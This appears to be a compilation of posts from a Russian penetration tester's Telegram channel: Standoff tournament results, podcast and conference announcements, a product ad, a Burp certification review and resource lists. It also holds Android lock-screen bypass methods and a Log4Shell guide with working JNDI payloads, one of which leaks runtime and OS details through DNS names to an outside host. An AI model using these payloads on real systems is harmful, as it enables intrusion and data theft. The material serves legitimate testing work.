Как стать хакером? Белым, конечно же 😉

Прямо сейчас в эфире Егор Богомолов из HackerU рассказывает про образование и практический опыт

#phdays #theStandoff

Ну чтож, время рассказать о прошедших событиях.

В эти 3 дня, с утра воскресенья (14.11) и до обеда вторника (16.11), мы (команда True0xA3 - Тру ОАЗ) участвовали в турнире The Standoff.

Надо сказать, что в ноябре ребята из PT делают чуть менее масштабное событие, всего 10 команд атакующих, отобранных по предыдущим играм, и 5 команд защитников. Тем не менее, инфраструктура была не менее громадной. Много чего хочется рассказать о прошедшем: о наших действиях, о соперничестве с командами, о том что нас ждало внутри инфраструктуры уже не кибергорода а киберстраны, но на это не хватит сообщения, поэтому попросту отмечу тут наши результаты, участников и наш отзыв.

В этом году мы заняли второе место среди 10 команд. Как водится мы вновь разменяли позиции с все теми же заклятыми соперниками;) (ни в коем случае не более того), с которыми меняемся местами уже не первый год. От этого как мне кажется, каждый Standoff становится еще интереснее для нас, т.к. ни разу пока ни кто не выигрывал два раза подряд, и мы все ждем этого момента с нетерпением. Это как те партии в шахматы или любые другие "качели" из соревновательных игр. Только попытка у нас раз в полгода.

В этот раз инфраструктура не порадовала нас пробивами доменов или богатой поверхностью атаки. Сеть была построена так, что все должны были идти стройной дорожкой через ряд DMZ'тов (демилитаризованных зон), развернуться по сетям удалось только под конец игры, когда уже было поздновато. Однако внутри сети нас ждало уже более 45 (еще пяток был собран по дороге) разных целей для атаки (возможных для реализации рисков), от которых разбегались глаза.
Если кратко, в этот раз инфраструктура была сложнее, защищеннее и прямолинейнее. Об этом говорит и то число рисков, которое удалось реализовать. (Не более 6 рисков среди всех команд).

В заключение повторю мантру прошлых лет: The Standoff - это для несгибаемых ребят, обладающих всем спектром навыков по атакам на информационные системы и слаженностью высокого уровня.

Здесь отмечу имена победителей, кто потратил любую долю своего времени в целях победы:

Иван Булавин
Павел Шлюндин
Роман Алфёров
Азиз Алимов
Сергей Гилев
Андрей Рогожкин
Константин Костеневский
Алексей Хайдин
Сергей Колесников
Саид Эфендиев
Николай Топорков
Никита Чистяков
Егор Богомолов
Антон Прохоров
Вячеслав Цепенников
Игорь Мотрони
Дмитрий Фролов

Спасибо всей моей команде за слаженность и поддержку, и спасибо каждому кто болел за нас;)

Ждем следующей возможности проявить себя!

#podcast

С пылу, с жару, спешу порадовать вас новым записанным подкастом!

В этот раз я поговорил с Денисом Рыбиным (Head of AppSec - бывшего Mail.ru, нынешнего бизнес юнита Mail.ru в VK) о том, кто такие AppSec специалисты, чем они отличаются от пентестров, чем отличается их скиллсет и траектория обучения, а также обо всем, что окружает их в работе!

Мне кажется наш подкаст становится с каждым разом все лучше и лучше, надеюсь вы это тоже оцените.

Все вопросы можете оставлять в чате, Я и Денис сможем на них поотвечать.

Егор Богомолов и Денис Рыбин — Взгляд на работу AppSec специалиста изнутри (https://podcast.ru/1589311841)

Я этого действительно уже заждался. Одна из самых толковых конференций в РФ.

🚩Конференция OFFZONE пройдет 25–26 августа 2022 года 🚩

Международная конференция по практической кибербезопасности OFFZONE уже в третий раз пройдет в Москве с 25 по 26 августа 2022 года в очном формате.

Тщательно подобранный контент, любимое комьюнити и, конечно, уютная атмосфера постапа — все остается на местах.

К сожалению, ни в прошлом, ни в позапрошлом годах конференцию провести не удалось в связи со сложной эпидеомиологической обстановкой. К счастью, правила проведения массовых мероприятий более-менее устаканились, поэтому удалось определиться с датой. 

Билетов пока нет в продаже, но уже скоро они появятся — планируйте бюджет заранее.

Цены, локация, спикеры, доклады — обо всем этом позже.

Следите за новостями на сайте конференции и в соцсетях: 
• Телеграм-канал
• Twitter
• Instagram
• Facebook

О, действительно любопытно. Думаю многим бы хотелось знать типовые подходы по обходу экрана блокировки Android.

Интересный доклад с прошедшего недавно митапа OWASP Melbourne, в котором рассказывается история человека пытающегося обойти экран блокировки путем подбора пин-кода. tl;dr - обошел с помощью NetHunter-а, OTG кабеля и самописного скрипта для брутфорса. Скрипт забирайте здесь.
Доклад совершенно ненапряжный и его можно посмотреть просто по фану. Там показано довольно много способов решения этой задачи и не исключено, что те, котрые не сработали у него - сработают у вас.
Способы такие:
1. Попробовать руками первые 20 вариантов из списка DataGenetics Research
2. Проверить комбинации важных дат (дни рождения, дни свадьбы, последние 4 цифры номера телефона, слова вроде LOVE,FUCK,etc... в T9 варианте)
3. Использовать Find My Device от Google
4. Использовать Find My Mobile от Samsung (или аналоги от других вендоров)
5. CVE-2015-3860 - крэш экрана блокировки на Samsung. Можно поискать аналоги у других вендоров
6. Использовать ADB чтобы удалить файл с пин-кодом/паттерном /data/system/gesture.key
7. Воспользоваться вот этим списком из еще 7ми способов с форума XDA
8. Попробовать специальные утилиты и устройства для мобильной криминалистики (forensic tools): Cellebrite, Oxygen, XRY, GrayKey, Octoplus, Odin + TWRP
9. Поискать публичные эксплойты
10. Использовать USB Rubber Ducky или аналоги (опционально спаять свой)
999. Выполнить сброс к заводским настройкам

Happy hacking 😎

#podcast

Подкаст!

Спешу порадовать записью нового выпуска подкаста MasterTalk;)

По прошествии TheStandoff мне оч. захотелось познакомить публику с капитаном нашей команды True0xA3, а также обсудить ряд тем:

1. Чуть конкретнее рассказать о произошедшем на турнире.
2. Поговорить о “внутренностях” нашей команды.
3. Поговорить об особенностях работы капита в подобных хакерских турнирах.
4. И в конце обсудить подобные подходы к корпоративному обучению и его целесообразоности.

Приятного прослушивания: https://podcast.ru/1589311841

Merry christmas

Exploitation guide
https://www.lunasec.io/docs/blog/log4j-zero-day/

Attack surface
https://github.com/YfryTchsGD/Log4jAttackSurface

#rce #0day #java #ldap

Какая жесть;)

Снова здраствуйте!

😉 Как будет выглядеть The Standoff 365?

В шестом выпуске подкаста Mastertalk Егор Богомолов разговаривает с Ярославом Бабиным о карьере в offensive и будущем The Standoff.

Ярослав Бабин — руководитель отдела анализа защищенности Positive Technologies и один из ключевых организаторов The Standoff. Сейчас его компания готовит к запуску платформу The Standoff 365. В новом выпуске вы узнаете:

⚡️ зачем становиться руководителем в ИБ;
⚡️ почему иногда важно не получить свою первую работу;
⚡️ как выглядит сотрудничество с осознанными клиентами;
⚡️ как будет устроен The Standoff 365;
⚡️ зачем новая платформа компаниям.

Если вы давно интересовались темой турнира The Standoff или сами хотите поучаствовать, этот выпуск — ваш шанс узнать больше.

Статическими майндмапами и аггрегаторами инфы уже никого не удивишь.

Подъехал пополняемый формат знаний о пентесте и все вокруг него:

https://www.mindmeister.com/ru/1756305170?t=I99P4f4KNO

Log4j

Хотел донести до тех, кто как и я не сразу узнал про различные трюки в уязвимости Log4Shell. А конкретно о том, как красиво и правильно подтвердить уязвимость в Log4j, когда при эксплуатации прилетает только DNS запрос вашего доменного имени. (Ведь это может быть False-Positive, в случае если какой-нибудь WAF или еще что-нибудь видит в трафике домен и запрашивает его для проверки.

При эксплуатации уязвимости вектор приводящий к возможности выполнения кода через сборку вашего внешнего объекта выглядит следующим образом:

- Для поиска объекта через LDAP: ${jndi:ldap://empty.jack.su/exploit}
- Или тоже самое для RMI: ${jndi:rmi://empty.jack.su/exploit}

Следует отметить, что здесь конструкции ${...} называются Lookup'ы. (Их много и они разные: https://logging.apache.org/log4j/2.x/manual/lookups.html) Они используются в Log4j для получения различной информации из окружения приложения и подстановки ее в конфигурацию Log4j. Lookup'ы могут быть вложенными. Т.е. можно сформировать следующую конструкцию ${lower:${base64:ZW10cHkuamFjaw==}}, что сначала раскодирует значение в Base64, а потом переведет его в нижний регистр.

Соответственно, если у вас не удается получить LDAP/RMI запрос на свой сервер, первое что можно сделать, это проверить не фильтруется ли трафик по определенным портам. А значит, перебираем возможные порты в нашей конструкции:

${jndi:ldap://empty.jack.su:3333/exploit}

Если запрос не пришел, но вы видите, что DNS запрос имени происходит, проверьте можете ли вы создать DNS имя, которое позволит вам вытащить какие-нибудь данные из окружения приложения, например:

${jndi:ldap://empty-${java:runtime}-${java:vm}-${java:os}-empty.jack.su:3333/exploit}

Также в случае каких-либо еще вопросов к вашему случаю с детектом Log4j, попробуйте банально поломать схему обращения и посмотреть появится ли DNS запрос (**помните, что DNS имена нужно постоянно изменять, т.к. они кешируются**):

${jndi:asdf://empty123.jack.su/exploit}

Если DNS запрос все еще приходит, значит дело не в Log4j, а в каком либо компоненте системы, который выдергивает все доменные имена из трафика и проверяет их.

Интересные Lookup’ы из мана по Log4j Lookups:

${docker:containerName}
${docker:imageName}
${env:USER}
${env:HOME}
${env:PWD}
${java:version}
${java:runtime}
${java:os}
${docker:hostIp}
${docker:host}
${docker:accountName}
${docker:clusterName}
${docker:podName}
${docker:masterUrl}
${spring:spring.application.name}
${sys:logPath}
${web:rootDir}
${web:serverInfo}

Если вы знаете еще что-то интересное, welcome в комментарии под постами!;)

XSignal

Мои знакомы создали интересный продукт. Продукт XSignal - это облачный сканер уязвимостей внешнего периметра сетевой инфраструктуры.

Но что в нем особенного?

Пользователь лицензии сразу после скана, может внутри личного кабинета выбрать Эксперта по ИБ/Пентестера, с которым может связаться для работы над найденной уязвимостью. Специалист может помочь проверить ее, дать детальные рекомендации и объяснить суть уязвимости, выполнить работу по перепроверке или вообще провести работы по анализу защищенности за вознаграждение.

Т.е. внутри находится маркетплейс со специалистами, где вы видите их рейтинг, отзывы, цены на время специалиста, его опыт, сертификации и пр.

Как мне кажется, это очень интересная особенность продукта, особенно для компаний среднего и малого бизнеса, которые могут проверить самое критичное место в свой ИТ-инфраструктуре (ее внешний периметр) и сразу же найти проверенного исполнителя заплатив ему всего за несколько часов работы, что будет стоить несоразмерно меньше, чем любой из возможных пентестов от аудиторов.

Но сюда я пишу не только для того, чтобы рассказать о нем потенциальным клиентам, но для того, чтобы рассказать о возможностях партнерства моим коллегам пентестерам.

Пентестеры могут присоединить к этой платформе, где будут размещены их профили для взаимодействия с ними, получат сканер в бесплатное использование и смогут получать вознаграждения за пополнение базы сканера полезностями.

Если у вас есть вопросы по сотрудничеству как со стороны использования сканера, так и со стороны партнерства, пишите: @gorbunov_me

До 31 января 2022 года действует спец. предложение (первым 50 клиентам, оплатившим годовую подписку):
1) Сделают бесплатно под ключ интеграцию в CI/CD (битбакет, гитхаб, гитлаб)
2) Дадут скидку в 50% от стоимости.

Burp Suite Certified Practitioner

Ссылка на курс:

https://portswigger.net/web-security/certification

Минимальная стоимость:

99$

Для кого сертификат:

Для специалистов по безопасности веб-приложений и любых приложений работающих с HTTP протоколами

Сложность (субъективно):

Средняя

Proctoring:

Есть (Первые 15 минут для идентификации личности)

Формат экзамена:

Экзамен длится 4 часа. Вам дается два веб-приложения с 3-мя этапами эксплуатации в каждом.

1. Получение низкопривилегированной учетной записи. 
2. Повышение привилегий до уровня администратора.
3. Получение доступа к файловой системе или исполнению команд ОС.

Задачи в курсе достаточно “задротские”, не все даже топовые специалисты могут решить с первого раза, т.к. весьма высоко влияние того какие приложения в какой конфигурации выпадут. Основные проблемы возникают при невнимательном изучении приложения, где все может зависит от одного символа или слова появляющегося в ответе. 

В задачах могут выпасть любые уязвимости из списка уязвимостей в PortSwigger Academy, в том числе изощренные Request Smuggling, CSTI (DOM-based XSS), OOB в XXE и пр. Если на них не набита рука, придется потратить время чтобы нахватать ошибок при реализации векторов атак.

Ключевая отличительная особенность заданий в экзамене от тех задач, что вы проходили при подготовке - это правила фильтрации (WAF) и изощренные случаи реализации приложений, которые могут сбить с толку и быть основной сложностью. 

Необходимость продления и условия:

5 лет действует, продлевается при пересдаче.

Подготовка и материалы:

Все подготовительные материалы есть в открытом доступе и до покупки курса в Академии PortSwigger (https://portswigger.net/web-security). Также авторы сертификации предоставляют возможность попрактиковаться в сдаче экзамена на одном примере приложения: https://portswigger.net/web-security/certification/practice-exam. Оно достаточно хорошо служит примером того, что вы встретите на экзамене. Также обязательно прочесть гайд перед сдачей экзамена: https://portswigger.net/web-security/certification/how-it-works#what-the-exam-involves

Комментарий сдавшего:

Сдавал в 2021 году. Вошел в первую сотню сдавших по миру. Довелось сдавать еще трех часовую версию экзамена. Экзамен действительно непростой. Если человек сдал его вообще без подсказок со стороны - это означает что он очень хорошо понимает типовые уязвимости веба в различных кейсах и у него набита рука на эксплуатацию, а самое важное он умеет замечать мельчайшие детали.
Более подробно описываю свои комментарии в сообщениях: https://news.1rj.ru/str/YAH_Channel/451
https://news.1rj.ru/str/YAH_Channel/454 

Автор рецензии и владелец сертификата:

Егор Богомолов (@empty_jack)

#certificate

С новым годом, всех увлечённых хакингом и не только! 🎅

Это был блестящий год, следующий будет ещё лучше;)
Главное: не теряйте огня в глазах, делайте то, что любите, знайте чего хотите и будь что будет!

Всех коллег по цеху поздравляю особенно!👨🏼‍💻 Под конец года нам надарили классных подарков;) желаю, чтобы они вам пригодились!

С началом нового года!

Забыли самый интересный канал про хакинг добавить...

Но подборочка норм.

Праздничные дни — это время не только отдохнуть, но и прокачать свои знания и скилы 💪🎓 Поэтому мы подготовили для вас несколько подборок интересных и полезных материалов от наших экспертов.

Первая подборка — от Николая Анисени, руководителя группы исследований безопасности мобильных приложений PT SWARM. В Positive Technologies он занимается аудитом мобильных приложений для Android и iOS, а также анализом защищенности веб-приложений, в том числе банковских, и систем дистанционного банковского обслуживания. Николай — опытный исследователь, отмеченный в залах славы Google, Microsoft, Яндекс, Instagram, Valve, Reddit, Evernote и других мировых компаний. Участвует в подготовке ежегодного форума PHDays, в прошлом — участник CTF в составе команды SiBears.

Читайте и практикуйтесь!

📝 Форум месяца:

CTF TIME — Открытые соревнования по практической безопасности с разборами.

📚 Базы знаний:

HowToHunt — Рекомендации по поиску уязвимостей.
Pentest Book — Пентест и сценарии проникновения.
HackTricks — Хакерские приемы и техники.

🌐 Telegram-каналы и чаты:

Android Guards — Безопасность Android-устройств и приложений.
Hack3rScr0lls — Красивые схемы по тестированию.
The Bug Bounty Hunter — Все о Bug Bounty.
Android Security & Malware — Новости ИБ с уклоном в мобилки.
Mobile AppSec World — Безопасность мобильных приложений.

🌌 Вселенная GitHub:

All About Bug Bounty — Все о Bug Bounty.
Payloads All The Things — Пейлоады и байпасы для веб-приложений.
31 Days of API Security Tips — Советы по тестированию API.
MindAPI — Бесплатный Mindmap по тестированию API.

🐦 За кем следить в Twitter:

Sergey Toshin — Хакер #1 в Google Play Security Rewards Program.